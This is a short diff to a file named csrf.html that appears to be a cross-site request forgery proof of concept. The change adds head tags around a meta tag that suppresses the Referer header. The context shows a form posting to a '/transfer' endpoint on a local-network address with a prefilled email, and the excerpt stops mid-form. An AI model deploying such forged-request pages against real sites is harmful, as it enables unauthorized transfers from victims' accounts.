--- a/csrf.html
+++ b/csrf.html
@@ -1,5 +1,7 @@
 <html>
+  <head>
   <meta name="referer" content="never">
+  </head>  
     <body>
         <form action="http://192.168.2.98:55824/transfer" method="POST">
             <input type="text" class="form-control" value="test@gmail.com">
